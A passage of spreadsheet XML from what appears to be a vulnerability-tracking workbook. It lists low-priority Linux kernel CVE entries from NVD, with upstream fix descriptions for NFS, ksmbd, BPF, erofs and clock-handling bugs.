      <c r="D515" s="5" t="inlineStr"/>
      <c r="E515" s="5" t="inlineStr"/>
      <c r="F515" s="5" t="inlineStr"/>
      <c r="G515" s="5" t="inlineStr"/>
      <c r="H515" s="5" t="inlineStr"/>
      <c r="I515" s="5" t="inlineStr"/>
      <c r="J515" s="5" t="inlineStr"/>
      <c r="K515" s="5" t="inlineStr"/>
      <c r="L515" s="5" t="inlineStr"/>
      <c r="M515" s="5" t="inlineStr"/>
      <c r="N515" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O515" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P515" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q515" s="5" t="inlineStr"/>
      <c r="R515" s="5" t="inlineStr"/>
      <c r="S515" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
clk: devres: fix cleanup in devm_clk_get_optional_enabled_with_rate()
devm_clk_get_optional_enabled_with_rate() registers its cleanup action
before setting the clock rate. If setting the rate fails, it attempts to
disable and unprepare a clock that was never enabled. This issue was
spotted while reviewing "rust: clk: add devres-managed clks" [1].
Register the cleanup action only after successfully preparing and enabling
the clock.
[1]: https://lore.kernel.org/rust-for-linux/20260706-clk-type-state-v5-3-67c5f326a16c@collabora.com</t>
        </is>
      </c>
      <c r="T515" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90147</t>
        </is>
      </c>
    </row>
    <row r="516">
      <c r="A516" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B516" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C516" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90148</t>
        </is>
      </c>
      <c r="D516" s="5" t="inlineStr"/>
      <c r="E516" s="5" t="inlineStr"/>
      <c r="F516" s="5" t="inlineStr"/>
      <c r="G516" s="5" t="inlineStr"/>
      <c r="H516" s="5" t="inlineStr"/>
      <c r="I516" s="5" t="inlineStr"/>
      <c r="J516" s="5" t="inlineStr"/>
      <c r="K516" s="5" t="inlineStr"/>
      <c r="L516" s="5" t="inlineStr"/>
      <c r="M516" s="5" t="inlineStr"/>
      <c r="N516" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O516" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P516" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q516" s="5" t="inlineStr"/>
      <c r="R516" s="5" t="inlineStr"/>
      <c r="S516" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFSv4: Fix incorrect argument passed to nfs4_delete_lease() in nfs4_add_lease()
When nfs4_add_lease() races with a delegation return, it calls
nfs4_delete_lease() to clean up. Previously, it passed priv,
which can legitimately be NULL. Passing a NULL priv eventually
leads to a NULL pointer dereference in generic_setlease().</t>
        </is>
      </c>
      <c r="T516" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90148</t>
        </is>
      </c>
    </row>
    <row r="517">
      <c r="A517" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B517" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C517" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90149</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2026-09-17</t>
        </is>
      </c>
      <c r="P517" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q517" s="5" t="inlineStr"/>
      <c r="R517" s="5" t="inlineStr"/>
      <c r="S517" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFSv4/flexfiles: fix NULL dereference for NFSv4.0 data servers
flexfiles accepts NFSv4.0 data servers, but two NFSv4 code paths assume
the data server client has a session. Unlike NFSv4.1+, an NFSv4.0 client
has no session (clp-&gt;cl_session is NULL; it uses clp-&gt;cl_slot_tbl), so
I/O to a v4.0 flexfiles DS oopses:
  - nfs4_init_ds_session() dereferences clp-&gt;cl_session-&gt;session_state
    while seeding the DS lease. It also only seeds cl_lease_time when
    NFS4_SESSION_INITING is set; without a session that never happens, so
    cl_lease_time stays 0 and nfs4_renew_state() busy-loops, requeuing
    every 5 seconds. Seed the lease whenever there is no session and
    return before touching session state.
  - ff_layout_async_handle_error_v4() dereferences
    clp-&gt;cl_session-&gt;fc_slot_table on every DS I/O error. Fall back to the
    v4.0 transport slot table (clp-&gt;cl_slot_tbl) when there is no session.</t>
        </is>
      </c>
      <c r="T517" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90149</t>
        </is>
      </c>
    </row>
    <row r="518">
      <c r="A518" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B518" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C518" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90150</t>
        </is>
      </c>
      <c r="D518" s="5" t="inlineStr"/>
      <c r="E518" s="5" t="inlineStr"/>
      <c r="F518" s="5" t="inlineStr"/>
      <c r="G518" s="5" t="inlineStr"/>
      <c r="H518" s="5" t="inlineStr"/>
      <c r="I518" s="5" t="inlineStr"/>
      <c r="J518" s="5" t="inlineStr"/>
      <c r="K518" s="5" t="inlineStr"/>
      <c r="L518" s="5" t="inlineStr"/>
      <c r="M518" s="5" t="inlineStr"/>
      <c r="N518" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O518" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P518" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q518" s="5" t="inlineStr"/>
      <c r="R518" s="5" t="inlineStr"/>
      <c r="S518" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
pnfs/blocklayout: Fix device leaks on parse failure
bl_parse_concat() and bl_parse_stripe() allocate a child device array and
then parse each child in turn.  If parsing a child fails, the failed child is
not counted in nr_children and the parent may be left with a children array
that bl_free_device() will not release when nr_children is zero.
Release the failed child and the already parsed children before returning the
error.  Also make bl_free_device() release the child array whenever the
children pointer is set, so that partially initialised concat or stripe
devices are cleaned up correctly.
bl_parse_scsi() can also fail after assigning d-&gt;bdev_file and dropping the
file reference.  Clear the pointer after fput() so that an outer cleanup path
does not put it again.</t>
        </is>
      </c>
      <c r="T518" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90150</t>
        </is>
      </c>
    </row>
    <row r="519">
      <c r="A519" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B519" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C519" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90151</t>
        </is>
      </c>
      <c r="D519" s="5" t="inlineStr"/>
      <c r="E519" s="5" t="inlineStr"/>
      <c r="F519" s="5" t="inlineStr"/>
      <c r="G519" s="5" t="inlineStr"/>
      <c r="H519" s="5" t="inlineStr"/>
      <c r="I519" s="5" t="inlineStr"/>
      <c r="J519" s="5" t="inlineStr"/>
      <c r="K519" s="5" t="inlineStr"/>
      <c r="L519" s="5" t="inlineStr"/>
      <c r="M519" s="5" t="inlineStr"/>
      <c r="N519" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O519" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P519" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q519" s="5" t="inlineStr"/>
      <c r="R519" s="5" t="inlineStr"/>
      <c r="S519" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFSv4: remove callback IDR entry on client allocation failure
nfs4_alloc_client() allocates an NFSv4.0 callback identifier before it
finishes setting up the client. If any later initialization step fails,
the error path frees the nfs_client directly with nfs_free_client(). That
bypasses nfs_put_client(), which is where the callback IDR entry is
removed during normal teardown.
A failed allocation can therefore leave cb_ident_idr pointing at a freed
nfs_client. A later NFSv4.0 callback lookup by cb_ident would find the
stale pointer and take a reference to it.
Make the callback IDR removal helper callable by the allocation failure
path, and remove the callback identifier before freeing the client.
This was found by a local static-analysis checker for publish-before-free
lifetime bugs and confirmed by manual inspection.</t>
        </is>
      </c>
      <c r="T519" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90151</t>
        </is>
      </c>
    </row>
    <row r="520">
      <c r="A520" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B520" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C520" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90152</t>
        </is>
      </c>
      <c r="D520" s="5" t="inlineStr"/>
      <c r="E520" s="5" t="inlineStr"/>
      <c r="F520" s="5" t="inlineStr"/>
      <c r="G520" s="5" t="inlineStr"/>
      <c r="H520" s="5" t="inlineStr"/>
      <c r="I520" s="5" t="inlineStr"/>
      <c r="J520" s="5" t="inlineStr"/>
      <c r="K520" s="5" t="inlineStr"/>
      <c r="L520" s="5" t="inlineStr"/>
      <c r="M520" s="5" t="inlineStr"/>
      <c r="N520" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O520" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P520" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q520" s="5" t="inlineStr"/>
      <c r="R520" s="5" t="inlineStr"/>
      <c r="S520" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb/server: fix session leak in ksmbd_session_register()
See the procedure below:
  smb2_sess_setup
    ksmbd_smb2_session_create
      __session_create
        atomic_set(&amp;sess-&gt;refcnt, 2)
        hash_add(sessions_table, &amp;sess-&gt;hlist, sess-&gt;id)
    ksmbd_session_register
      xa_store(&amp;conn-&gt;sessions, sess-&gt;id, sess) // fail
    ksmbd_user_session_put
      atomic_dec(&amp;sess-&gt;refcnt) // refcnt is 1, session is not freed
Remove the session from sessions_table and drop its table reference if
xa_store() fails.</t>
        </is>
      </c>
      <c r="T520" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90152</t>
        </is>
      </c>
    </row>
    <row r="521">
      <c r="A521" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B521" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C521" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90153</t>
        </is>
      </c>
      <c r="D521" s="5" t="inlineStr"/>
      <c r="E521" s="5" t="inlineStr"/>
      <c r="F521" s="5" t="inlineStr"/>
      <c r="G521" s="5" t="inlineStr"/>
      <c r="H521" s="5" t="inlineStr"/>
      <c r="I521" s="5" t="inlineStr"/>
      <c r="J521" s="5" t="inlineStr"/>
      <c r="K521" s="5" t="inlineStr"/>
      <c r="L521" s="5" t="inlineStr"/>
      <c r="M521" s="5" t="inlineStr"/>
      <c r="N521" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O521" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P521" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q521" s="5" t="inlineStr"/>
      <c r="R521" s="5" t="inlineStr"/>
      <c r="S521" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: bound smb_check_perm_dacl() ACE walks by DACL size
smb_check_perm_dacl() validates that the DACL fits inside the NT
security descriptor, but then bounds its two ACE walks by the
remaining NTSD length (acl_size) rather than the DACL's declared
size (pdacl_size).
When pdacl-&gt;size is smaller than the trailing NTSD buffer, bytes
after the declared DACL boundary - still inside the stored security
descriptor - are parsed as ACEs during access checks.  A crafted
DACL can place an access-granting ACE beyond pdacl-&gt;size, and the
current code accepts it during SMB2_CREATE access validation, while
parse_dacl() and smb_inherit_dacl() stop at pdacl_size.
Bound both ACE walks by pdacl_size to match the DACL boundary
semantics used elsewhere in the server.
Validation:
- semantic KUnit harness shows the post-boundary ACE is selected
  before the fix and rejected (EACCES) after it
- linux master (7.2-rc6), x86_64</t>
        </is>
      </c>
      <c r="T521" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90153</t>
        </is>
      </c>
    </row>
    <row r="522">
      <c r="A522" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B522" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C522" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90154</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2026-09-17</t>
        </is>
      </c>
      <c r="P522" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q522" s="5" t="inlineStr"/>
      <c r="R522" s="5" t="inlineStr"/>
      <c r="S522" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: scope session state changes to bound connections
ksmbd_all_conn_set_status() treats every connection whose transient
binding flag is set as belonging to the target SessionId.  A logoff or
session replacement can consequently move an unrelated connection to
NEED_RECONNECT or NEED_SETUP.
Pass the target session itself and select connections using either the
connection-local session xarray or the session's permanent channel list.
Use the same association test while waiting for requests to drain.
Serialize session-wide status changes under request_lock and do not
overwrite EXITING or RELEASING. Protect the shutdown transition with the
same lock so a concurrent session update cannot revive a closing
connection.</t>
        </is>
      </c>
      <c r="T522" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90154</t>
        </is>
      </c>
    </row>
    <row r="523">
      <c r="A523" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B523" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C523" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90155</t>
        </is>
      </c>
      <c r="D523" s="5" t="inlineStr"/>
      <c r="E523" s="5" t="inlineStr"/>
      <c r="F523" s="5" t="inlineStr"/>
      <c r="G523" s="5" t="inlineStr"/>
      <c r="H523" s="5" t="inlineStr"/>
      <c r="I523" s="5" t="inlineStr"/>
      <c r="J523" s="5" t="inlineStr"/>
      <c r="K523" s="5" t="inlineStr"/>
      <c r="L523" s="5" t="inlineStr"/>
      <c r="M523" s="5" t="inlineStr"/>
      <c r="N523" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O523" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P523" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q523" s="5" t="inlineStr"/>
      <c r="R523" s="5" t="inlineStr"/>
      <c r="S523" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: detach blocked lock requests before freeing
A file_lock retained by ksmbd for byte-range lock bookkeeping can still
be part of the VFS blocked-request graph. In particular, the VFS can
chain a new waiter below an already blocked request through
flc_blocked_requests. The ksmbd_file reference count does not cover that
graph.
Both __ksmbd_close_fd() and the cross-request unlock path free these
retained file_lock objects directly. If a dependent waiter is still
attached, locks_release_private() hits
BUG_ON(!list_empty(&amp;flc-&gt;flc_blocked_requests)). The same lifetime
mismatch can leave a freed ksmbd_lock reachable through its request-local
llist.
Detach the file_lock from the blocked-request graph before freeing it in
the close, cross-request unlock, and rollback paths. locks_delete_block()
also wakes requests chained below the object. Remove llist when a
completed lock is published so a globally visible ksmbd_lock no longer
points into the submitting worker's stack.</t>
        </is>
      </c>
      <c r="T523" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90155</t>
        </is>
      </c>
    </row>
    <row r="524">
      <c r="A524" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B524" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C524" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90156</t>
        </is>
      </c>
      <c r="D524" s="5" t="inlineStr"/>
      <c r="E524" s="5" t="inlineStr"/>
      <c r="F524" s="5" t="inlineStr"/>
      <c r="G524" s="5" t="inlineStr"/>
      <c r="H524" s="5" t="inlineStr"/>
      <c r="I524" s="5" t="inlineStr"/>
      <c r="J524" s="5" t="inlineStr"/>
      <c r="K524" s="5" t="inlineStr"/>
      <c r="L524" s="5" t="inlineStr"/>
      <c r="M524" s="5" t="inlineStr"/>
      <c r="N524" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O524" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P524" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q524" s="5" t="inlineStr"/>
      <c r="R524" s="5" t="inlineStr"/>
      <c r="S524" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: safely discard unregistered deferred locks
When vfs_lock_file() defers a lock, smb2_lock() puts its ksmbd_lock on
rollback_list before allocating and registering the asynchronous work.
If either operation fails, rollback assumes that smb_lock-&gt;conn is
initialized and dereferences NULL. The deferred file_lock also remains
linked into the VFS blocked-lock state while it is freed.
Keep the lock off rollback_list until async setup succeeds. On setup
failures, explicitly unblock and wake the deferred lock before freeing it
and its ksmbd wrapper.</t>
        </is>
      </c>
      <c r="T524" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90156</t>
        </is>
      </c>
    </row>
    <row r="525">
      <c r="A525" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B525" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C525" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90157</t>
        </is>
      </c>
      <c r="D525" s="5" t="inlineStr"/>
      <c r="E525" s="5" t="inlineStr"/>
      <c r="F525" s="5" t="inlineStr"/>
      <c r="G525" s="5" t="inlineStr"/>
      <c r="H525" s="5" t="inlineStr"/>
      <c r="I525" s="5" t="inlineStr"/>
      <c r="J525" s="5" t="inlineStr"/>
      <c r="K525" s="5" t="inlineStr"/>
      <c r="L525" s="5" t="inlineStr"/>
      <c r="M525" s="5" t="inlineStr"/>
      <c r="N525" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O525" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P525" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q525" s="5" t="inlineStr"/>
      <c r="R525" s="5" t="inlineStr"/>
      <c r="S525" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Reject negative optlen in cgroup getsockopt hook
A cgroup getsockopt BPF program can shrink ctx-&gt;optlen after the
kernel getsockopt handler has run. The kernel-buffer variant, used by
TCP_ZEROCOPY_RECEIVE, only rejects values larger than the original
length.
If BPF writes a negative optlen, that value is accepted and propagated
back to the TCP getsockopt code. It can then be passed to
copy_to_sockptr() as a size_t and trigger the hardened usercopy
bytes &gt; INT_MAX warning.
Reject negative ctx.optlen in __cgroup_bpf_run_filter_getsockopt_kern(),
matching the lower-bound validation already present in the sockptr-based
getsockopt hook.</t>
        </is>
      </c>
      <c r="T525" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90157</t>
        </is>
      </c>
    </row>
    <row r="526">
      <c r="A526" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B526" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C526" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90158</t>
        </is>
      </c>
      <c r="D526" s="5" t="inlineStr"/>
      <c r="E526" s="5" t="inlineStr"/>
      <c r="F526" s="5" t="inlineStr"/>
      <c r="G526" s="5" t="inlineStr"/>
      <c r="H526" s="5" t="inlineStr"/>
      <c r="I526" s="5" t="inlineStr"/>
      <c r="J526" s="5" t="inlineStr"/>
      <c r="K526" s="5" t="inlineStr"/>
      <c r="L526" s="5" t="inlineStr"/>
      <c r="M526" s="5" t="inlineStr"/>
      <c r="N526" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O526" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P526" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q526" s="5" t="inlineStr"/>
      <c r="R526" s="5" t="inlineStr"/>
      <c r="S526" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
m68k: nfcon: Do not call console_is_registered() in nfcon_device()
Since 7c2af0f634f1 ("tty: tty_io: use console_list_lock for list
synchronization") show_cons_active() calls the .device() method under
the console_list_lock, but console_is_registered() tries to acquire
console_list_lock as well, causing a deadlock.  It should not be
necessary to check console_is_registered() here since the function
should not be called in the fist place when the console is not
registered.</t>
        </is>
      </c>
      <c r="T526" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90158</t>
        </is>
      </c>
    </row>
    <row r="527">
      <c r="A527" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B527" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C527" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90159</t>
        </is>
      </c>
      <c r="D527" s="5" t="inlineStr"/>
      <c r="E527" s="5" t="inlineStr"/>
      <c r="F527" s="5" t="inlineStr"/>
      <c r="G527" s="5" t="inlineStr"/>
      <c r="H527" s="5" t="inlineStr"/>
      <c r="I527" s="5" t="inlineStr"/>
      <c r="J527" s="5" t="inlineStr"/>
      <c r="K527" s="5" t="inlineStr"/>
      <c r="L527" s="5" t="inlineStr"/>
      <c r="M527" s="5" t="inlineStr"/>
      <c r="N527" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O527" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P527" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q527" s="5" t="inlineStr"/>
      <c r="R527" s="5" t="inlineStr"/>
      <c r="S527" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Disallow bpf_{g,s}etsockopt() in cgroup UNIX getname hooks
_bpf_setsockopt() and _bpf_getsockopt() call sock_owned_by_me() for
full sockets, so these helpers expect the socket lock to be held.
BPF_CGROUP_UNIX_GETPEERNAME and BPF_CGROUP_UNIX_GETSOCKNAME run BPF
programs without acquiring the socket lock. A program attached to
either hook can therefore trigger the sock_owned_by_me() warning by
calling bpf_setsockopt() or bpf_getsockopt().
Disallow bpf_setsockopt() and bpf_getsockopt() for CGROUP_UNIX_GETPEERNAME
and CGROUP_UNIX_GETSOCKNAME.</t>
        </is>
      </c>
      <c r="T527" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90159</t>
        </is>
      </c>
    </row>
    <row r="528">
      <c r="A528" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B528" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C528" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90160</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2026-09-17</t>
        </is>
      </c>
      <c r="P528" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q528" s="5" t="inlineStr"/>
      <c r="R528" s="5" t="inlineStr"/>
      <c r="S528" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
lwt_bpf: Restore reserved headroom after xmit program
ip_finish_output2() expands an skb to LL_RESERVED_SPACE(dev) before LWT
xmit. An LWT_XMIT BPF program can then modify the skb head and still
return BPF_OK, so bpf_xmit() rechecks the remaining headroom before the
skb continues to neighbour output.
That recheck uses dst-&gt;dev-&gt;hard_header_len. This is not enough for the
neighbour cached-header path: neigh_hh_output() copies the cached hardware
header using the aligned hh_cache size, HH_DATA_MOD for short headers or
HH_DATA_ALIGN(hh_len) otherwise.
On Ethernet, hard_header_len is 14 but the cached copy needs 16 bytes. If
an LWT_XMIT BPF program calls bpf_skb_change_head(skb, 1, 0), the skb can
still have 15 bytes of headroom after the program. The existing check
accepts that, after which neigh_hh_output() hits its headroom warning and
drops the skb.
Use LL_RESERVED_SPACE(dst-&gt;dev) in the post-BPF headroom check to match
the reservation made before LWT xmit.</t>
        </is>
      </c>
      <c r="T528" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90160</t>
        </is>
      </c>
    </row>
    <row r="529">
      <c r="A529" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B529" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C529" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90161</t>
        </is>
      </c>
      <c r="D529" s="5" t="inlineStr"/>
      <c r="E529" s="5" t="inlineStr"/>
      <c r="F529" s="5" t="inlineStr"/>
      <c r="G529" s="5" t="inlineStr"/>
      <c r="H529" s="5" t="inlineStr"/>
      <c r="I529" s="5" t="inlineStr"/>
      <c r="J529" s="5" t="inlineStr"/>
      <c r="K529" s="5" t="inlineStr"/>
      <c r="L529" s="5" t="inlineStr"/>
      <c r="M529" s="5" t="inlineStr"/>
      <c r="N529" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O529" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P529" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q529" s="5" t="inlineStr"/>
      <c r="R529" s="5" t="inlineStr"/>
      <c r="S529" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
erofs: fix interlaced ztailpacking pclusters
On-disk sizes of interlaced pclusters should be block-aligned, and
ztailpacking interlaced pclusters should be invalid at all.
Currently, mkfs.erofs won't generate any interlaced pcluster with
ztailpacking enabled, so this doesn't affect any existing valid
filesystems.
However, crafted images can contain invalid interlaced ztailpacking
pclusters, resulting in an out-of-bounds read from a kmap'd page and
copying irrelevant kernel memory into userspace-visible page cache.</t>
        </is>
      </c>
      <c r="T529" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90161</t>
        </is>
      </c>
    </row>
    <row r="530">
      <c r="A530" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B530" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C530" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90162</t>
        </is>
      </c>
      <c r="D530" s="5" t="inlineStr"/>
      <c r="E530" s="5" t="inlineStr"/>
      <c r="F530" s="5" t="inlineStr"/>
      <c r="G530" s="5" t="inlineStr"/>
      <c r="H530" s="5" t="inlineStr"/>
      <c r="I530" s="5" t="inlineStr"/>
      <c r="J530" s="5" t="inlineStr"/>
      <c r="K530" s="5" t="inlineStr"/>
      <c r="L530" s="5" t="inlineStr"/>
      <c r="M530" s="5" t="inlineStr"/>
      <c r="N530" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O530" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P530" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q530" s="5" t="inlineStr"/>
      <c r="R530" s="5" t="inlineStr"/>
      <c r="S530" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: defer publishing granted locks to prevent UAF/double-free race
In smb2_lock(), mid-batch granted locks are published to connection-wide
(conn-&gt;lock_list) and file-wide (fp-&gt;lock_list) lists immediately upon
vfs_lock_file() success, while also remaining tracked on the stack-local
rollback_list.
If a subsequent element in the same SMB2_LOCK request array fails
validation or execution, the thread jumps to out: and walks
rollback_list to undo previously granted locks. However, because the
granted lock was already published to conn-&gt;lock_list, a concurrent
UNLOCK request on the same connection can find the lock object and
kfree() it before the rollback loop executes.
When the granting thread subsequently walks rollback_list, it
dereferences and frees the already-freed ksmbd_lock structure, resulting
in a Use-After-Free and Double-Free (on both ksmbd_lock and struct
file_lock).
Fix this by deferring the publication of granted locks to
conn-&gt;lock_list and fp-&gt;lock_list until after the entire array of lock
elements has been processed without error. Mid-batch grants remain
tracked exclusively on the request-local rollback_list until the whole
